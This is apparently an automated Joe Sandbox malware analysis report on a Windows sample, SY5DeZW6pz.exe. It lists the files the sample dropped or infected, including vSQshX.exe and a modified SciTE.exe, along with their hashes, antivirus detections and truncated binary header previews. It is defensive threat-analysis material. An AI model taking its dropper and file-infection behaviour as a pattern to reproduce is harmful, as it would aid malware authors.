                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                  • Excluded IPs from analysis (whitelisted): 20.189.173.22, 20.42.65.92
                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, eudb.ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtOpenFile calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  23:41:40API Interceptor2x Sleep call for process: WerFault.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASNs

                                  No context

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\vSQshX.exe
                                  File Type:MS-DOS executable
                                  Category:dropped
                                  Size (bytes):19456
                                  Entropy (8bit):6.59099388193422
                                  Encrypted:false
                                  SSDEEP:384:1FqSuXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:rqQGPL4vzZq2o9W7GsxBbPr
                                  MD5:0D923288354DF40E2DA5BAACB10C3FC9
                                  SHA1:E407607B12D979CE65E5EA9EE46595ADD2A20593
                                  SHA-256:454BB82D16655E32EC8A6D4AAA3A8CF4774A71C92E03AB9F1016BD120CA1B74E
                                  SHA-512:2CEAF6F9B2080FE2A7C261EDF30165492EEDB0AB5DD8D3007DD3C531AB69D120AD9A4EAA2D8E7A27E053F68A37B5D9B3A87A6309A36E1251327CA10167D4115B
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Reputation:low
                                  Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

                                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\vSQshX.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):1273856
                                  Entropy (8bit):6.69023953264788
                                  Encrypted:false
                                  SSDEEP:24576:07GO7dtrjrICw9XuXo7beSTdt5xbX02uvfTXfBxrj3d5E/jKQvVj4YpdjYY0td78:1EtnrICSooGSTD5xbX022fjBxrj3
                                  MD5:DD35F52225719254572E087F6E0FEC59
                                  SHA1:7F4D5FBDB477B008F4D1FAC11043AD5257CAF7C1
                                  SHA-256:0B9CEF4853588126D63E8639199CC76A1D1BF673769F0E75AE26B32908AAD956
                                  SHA-512:D9ED182CA6C59FBA74A57FF2105B38E87AF892D518ECE98452B5FE546532ED1ACC77186478600F0F4AC97BABA43C4616BCAD5403C4E0CB81A9B050DDC747C5F7
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Reputation:low
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<.._].._].._]..R. ..]..R....]..R.!.L\..V%B.\]..V%R.F].._]...\....$.=]......^]..R...^].._]V.^]......^]..Rich_]..........................PE..L....r.Z.................*...l....................@................................................................. ...............................................................................@...@............................................text...(........................... ..`.rdata..............................@..@.data...<...........................@....rsrc................J..............@..@...r.uO..P.......B.................. ...................................................................................................................................................................................................................................................................................................

                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SY5DeZW6pz.exe_5a1e64436764aeb06a12223e505a1adc0f838d9_cfc0479b_04a1246b\Report.wer

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.8704783848702043
                                  Encrypted:false
                                  SSDEEP:96:hUFoi8KlIqh6oI7RC6tpXIQcQvc6QcEDMcw3DL+HbHg/8BRTf3o8Fa9iVf9Tx+id:eitAqHBUZMXoj+V/u7sxeS274It5
                                  MD5:D3380E9EC8451D197A6A9C368BDD3F07
                                  SHA1:7AB48DDA2C097EF637E3737FEC39FEC6AE36E866
                                  SHA-256:A8527F9F7090AEA42F9624EC29330C65FC2478283AC1906A2F8C7C5B4FD01EEA
                                  SHA-512:D0296EE4301237AB22C5AFD255CD904C258C4D8381566B38E448606637B3202C237F659F6324499D5F62B587C793A2BB32B720DBC7B957E5A6F3E8429F9183C1
                                  Malicious:true
                                  Reputation:low
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.6.4.5.5.6.9.1.9.0.4.9.0.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.6.4.5.5.6.9.8.7.9.5.5.0.5.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.7.a.6.e.1.b.5.-.4.e.e.a.-.4.d.9.0.-.a.d.5.0.-.e.e.c.8.2.2.e.0.9.f.5.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.f.c.1.d.e.8.c.-.7.5.d.d.-.4.e.f.4.-.a.8.a.a.-.b.4.a.2.c.6.d.e.8.8.9.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.Y.5.D.e.Z.W.6.p.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.c.c.-.0.0.0.1.-.0.0.1.f.-.6.f.9.2.-.3.f.6.8.8.2.b.d.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.6.9.3.f.4.3.d.0.7.0.b.8.1.0.3.3.1.7.1.3.e.6.f.6.d.e.3.4.2.3.7.0.0.0.0.f.f.f.f.!.0.0.0.0.7.8.0.6.d.5.1.1.3.2.e.4.0.7.2.8.f.5.8.1.3.7.4.a.9.d.7.2.d.9.7.1.3.b.f.f.2.d.d.0.!.S.Y.5.D.e.Z.W.6.p.z...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_vSQshX.exe_e41397ed243f95936a1fabef5fb2c6d1bf7554_3e01cb5b_16a9314c\Report.wer

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):1.0000840288282822
                                  Encrypted:false
                                  SSDEEP:96:IuFM+iZ3KhnQ7afRpXIQcQvc6QcEDMcw3DL+HbHg/5kseugtYsaV9w72SGBDLiwW:HViyHBUZMXoj/xMY/u7sxeS274Itm
                                  MD5:05C927751761258263D02231C1A09155
                                  SHA1:F40B6BE7AE8E366792D048D5AB6FD7C737A4DB6D
                                  SHA-256:6F0676046149D42EAAA00A7A05398DDF88D7FFFAF33F153DB73AFF48A28752D4
                                  SHA-512:A37A0C334FFF3CD632FEF616EFE2D0C429D298DBC954E4AD878F1D2AB01EFD72CF3FCF68CA8C0AE88F55A8748A3B019AD087CFC6E8FFBC8A2873739F1F5C5704
                                  Malicious:false
                                  Reputation:low
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.6.4.5.5.6.9.9.4.3.8.8.1.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.6.4.5.5.7.0.3.1.8.8.7.8.6.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.d.3.2.9.f.4.-.3.5.d.5.-.4.1.1.c.-.a.0.b.c.-.c.f.b.a.2.1.3.0.3.0.6.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.b.2.0.0.0.6.0.-.e.5.e.c.-.4.a.8.f.-.a.5.6.5.-.b.1.2.5.7.8.1.5.1.9.9.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.v.S.Q.s.h.X...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.a.4.-.0.0.0.1.-.0.0.1.f.-.6.b.d.9.-.f.7.6.8.8.2.b.d.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.3.3.0.4.d.3.c.8.f.7.3.c.d.1.f.a.1.7.6.4.d.4.d.0.9.b.6.d.5.1.c.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.v.S.Q.s.h.X...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER182.tmp.dmp

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Wed Aug 31 21:41:32 2022, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):49104
                                  Entropy (8bit):2.019836279961016
                                  Encrypted:false
                                  SSDEEP:384:/Xml5KtemOZb04hXOktM+Ewt+tHrU49Y:q0temOxOkli
                                  MD5:9C7FAD2523F963F71599B42E364605CC
                                  SHA1:09B1CAABA19A1584796F0863519C93AD02AD1DD0
                                  SHA-256:1ED520A43D1D1DE9097238F5A09F90FBB64F1028AC84227A66F947AD76711673
                                  SHA-512:BC3C6CE399ED32967AF5DF81247F9130CDF31FE19961205347C7D5D89D45B2575038DE646676E3BE9C4ED53CB4E138A13F9CBCFB8D6DF83410CD8054CBB718D2
                                  Malicious:false
                                  Reputation:low
                                  Preview:MDMP....... ..........c....................................$....,..........T.......8...........T...........P................................................................................................U...........B......\.......GenuineIntelW...........T..............c.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1EED.tmp.dmp

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 15 streams, Wed Aug 31 21:41:40 2022, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):168314
                                  Entropy (8bit):1.8045574036023055
                                  Encrypted:false
                                  SSDEEP:768:yMIuLhbf6N3TVHY1Sf+B9xIym3QKCRyV1Qoo:rFbyxBHCzvSD3QE3Qoo
                                  MD5:067CC1DDDB06F6B874D6C06BA3930980
                                  SHA1:F241F0C82B93846000C85C1D87CFE1CBA41C8017
                                  SHA-256:5B6830A566B86B306A1EFB1302BF801148000B45FCCE5F3784521DC7FB51A083
                                  SHA-512:9D2BF317297AD34DE51722E91B33FCD2FE271B288DF5D96734B72B2A48FE6E5E20064A2897BFB0D9AD6ACEFDBE957C1A5C404A366E59268F505C8F79F795A025
                                  Malicious:false
                                  Reputation:low
                                  Preview:MDMP....... ..........c........................|...........<...4"...........U..........`.......8...........T............9...W..........p"..........\$...................................................................U...........B.......$......GenuineIntelW...........T..............c.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER26BE.tmp.WERInternalMetadata.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8260
                                  Entropy (8bit):3.6984522366757666
                                  Encrypted:false
                                  SSDEEP:192:Rrl7r3GLNiK66ag6YmB6vUJgmfASS+prf89bhXsf0kLm:RrlsNi/6d6YY6vUJgmfAS+hcfs
                                  MD5:808700FFDBF2CA592D551781445F4FDD
                                  SHA1:3DEE23C640724E5C024A7DF1589C3E8B0FF59BD1
                                  SHA-256:652D7C76EF7B8829AB9DDF9710AD0BDA839C1D6A82CF61E8C0EBBB3A680F76FE
                                  SHA-512:0EF1C347C67C98154AD517F090B36D7A7FA9071C3AB18CCF88E6D3A4C266C33891C7FE493E9CEB25C98AEED18C884507559F2085652E17473EC6A5E25392020E
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.4.0.<./.P.i.d.>.......

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2855.tmp.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4535
                                  Entropy (8bit):4.445729489574115
                                  Encrypted:false
                                  SSDEEP:48:cvIwSD8zsZrJgtWI9A2Wgc8sqYjT8fm8M4JA6FJJ+q8i6sgwBd:uITfbbXgrsqYcJdisgwBd
                                  MD5:C23271359A945888EF17E4B4EFC0D4A2
                                  SHA1:B0350C9BEC6B702368289D1EEBBE3DADD9BBF363
                                  SHA-256:997FB19CA6E1EF2D413D37F54E2BDBBB65BBB86D68195D9110EE45C69137CCC9
                                  SHA-512:B8DD1376FD8D5C9EEF43C864647F9D8F7085920DEEE448CA519406F93CE1014386D75A9E0A32B07B5DC5C9EE75325DB4C70E41FC59B5B609411EBDC6538428EC
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1672252" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F2.tmp.WERInternalMetadata.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8404
                                  Entropy (8bit):3.69901124223282
                                  Encrypted:false
                                  SSDEEP:192:Rrl7r3GLNiWX6UcC6YecSUmlDgmfrSS+prt89b0YSOsf7ycm:RrlsNi+6UcC6YFSUSDgmfrSU0Pf7Y
                                  MD5:010A43B46D6D3E57F988C51E7006799D
                                  SHA1:EDF92FB8F9AE7C8B7A74C68D896CB2B82A149311
                                  SHA-256:F8F830CB1C45C8F40F7FC2FA3FE8FE7AD36769A46D2CAF399D5EE82537A6A40C
                                  SHA-512:CCB2A9AD08504A6F1456CD7420E49EB138148FE27F298195CEF418FAC1AF5CC202EF6090473F5388D4837AC857EDE223AE977BAE131C479A18085FE9E828F167
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.8.0.<./.P.i.d.>.......

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8E7.tmp.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4704
                                  Entropy (8bit):4.492486454457837
                                  Encrypted:false
                                  SSDEEP:48:cvIwSD8zsZrJgtWI9A2Wgc8sqYjI8fm8M4J2AVLzMFz+q8vXVLzNIxkM6Sd:uITfbbXgrsqYhJjziKdzNIxd6Sd
                                  MD5:8F6D08F91C558BE006B16A4916049448
                                  SHA1:41D3EF9F43DDEE34A9E8B65413E53A18A2E4A7FE
                                  SHA-256:14C64315B8ADC742DD26F579E669972BA163B4101462610743A682127D7A5F07
                                  SHA-512:E56B0174BE4608648D74FF1F452EA984CD46177CDF138F65F42B47297D02C84AC8E667E29B75A8275D9209F930E935DB318081262808358DC83A15223C7F5829
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1672252" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\k1[1].rar

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\vSQshX.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.

                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\k2[1].rar

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\vSQshX.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.

                                  C:\Users\user\AppData\Local\Temp\584026FF.exe

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\vSQshX.exe
                                  File Type:ASCII text
                                  Category:modified
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.

                                  C:\Users\user\AppData\Local\Temp\7830502D.exe

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\vSQshX.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.

                                  C:\Users\user\AppData\Local\Temp\vSQshX.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\SY5DeZW6pz.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):15872
                                  Entropy (8bit):7.031113762428177
                                  Encrypted:false
                                  SSDEEP:384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
                                  MD5:56B2C3810DBA2E939A8BB9FA36D3CF96
                                  SHA1:99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
                                  SHA-256:4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
                                  SHA-512:27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: Metadefender, Detection: 76%, Browse
                                  • Antivirus: ReversingLabs, Detection: 100%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a

                                  Download File
                                  Process:C:\Users\user\Desktop\SY5DeZW6pz.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):46
                                  Entropy (8bit):1.0424600748477153
                                  Encrypted:false
                                  SSDEEP:3:/lbq:4
                                  MD5:8CB7B7F28464C3FCBAE8A10C46204572
                                  SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                                  SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                                  SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                                  Malicious:false
                                  Preview:........................................user.

                                  C:\Windows\appcompat\Programs\Amcache.hve

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\vSQshX.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):1572864
                                  Entropy (8bit):4.301794266776387
                                  Encrypted:false
                                  SSDEEP:12288:mEG0Th31T9p6rTSPer9W31vNwBae0NhX21KHHNYmDbrSPV7IRO:ZG0Th31T9pWTSPt/wu
                                  MD5:78B824E44CB084B033F83E6AF4590FCA
                                  SHA1:3D67B3A5F784276B46B107B0CEF7D1AE08F5235B
                                  SHA-256:5B0C710A36AC721E98FA508558F60054B9694FDF18402A3C8CE726541C739656
                                  SHA-512:615503A647EAC5FCF8C7EF4869A5AF9A15E444A3AC64E4BC0CD6684B94043E4E7EADB47E9A657EDDB3892E6A291C6B3ECFB798AC87A621D226B6B26A84919E76
                                  Malicious:false
                                  Preview:regfP...P...p.\..,.................. .... ......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmR..k.................................................................................................................................................................................................................................................................................................................................................Z.6........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):5.755823427225404
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
